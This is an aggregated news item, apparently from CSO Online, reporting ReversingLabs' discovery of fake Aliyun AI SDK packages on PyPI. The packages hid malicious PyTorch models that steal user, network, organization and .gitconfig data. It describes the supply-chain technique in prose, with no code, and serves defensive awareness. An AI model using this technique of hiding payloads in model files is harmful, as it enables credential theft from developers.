URL has been copied successfully!
Poisoned models in fake Alibaba SDKs show challenges of securing AI supply chains
URL has been copied successfully!

Collecting Cyber-News from over 60 sources

Poisoned models in fake Alibaba SDKs show challenges of securing AI supply chains

Malicious code in ML models is hard to detect: While Hugging Face hosts models directly, PyPI hosts Python software packages, so detection of poisoned models hidden inside Pickle files hidden inside packages could prove even harder for developers and PyPI’s maintainers, given the extra layer of obfuscation.The attack campaign discovered by ReversingLabs involved three packages: aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk. Together the three packages were downloaded 1,600 times, which is significant considering they were online for less than a day before they were discovered and taken down.Developers’ computers are valuable targets because they typically contain a variety of credentials, API tokens, and other access keys to various cloud and local infrastructure services. Compromising such a computer can easily lead to lateral movement to other parts of the environment.The malicious SDKs uploaded to PyPI loaded the malicious PyTorch models through the __init__.py script. The models then executed base64-obfuscated code designed to steal information about the logged-in user, the network address of the infected machine, the name of the organization that the machine belonged to, and the contents of the .gitconfig file.There are signs in the malicious code that the main target were developers located in China, given the lure of Aliyun SDKs, as Chinese developers are more likely to use Alibaba’s AI services. However, the technique can be used against any developer with any lure wrapped around a malicious model.”This is a clever approach, since security tools are only starting to implement support for the detection of malicious functionality inside ML models,” the ReversingLab researchers wrote. “Reporting security risks related to ML model file formats is also in its early stages. To put it simply, security tools are at a primitive level when it comes to malicious ML model detection. Legacy security tooling is currently lacking this required functionality.”

First seen on csoonline.com

Jump to article: www.csoonline.com/article/3998351/poisoned-models-hidden-in-fake-alibaba-sdks-show-challenges-of-securing-ai-supply-chains.html

Loading

Share via Email
Share on Facebook
Tweet on X (Twitter)
Share on Whatsapp
Share on LinkedIn
Share on Xing
Copy link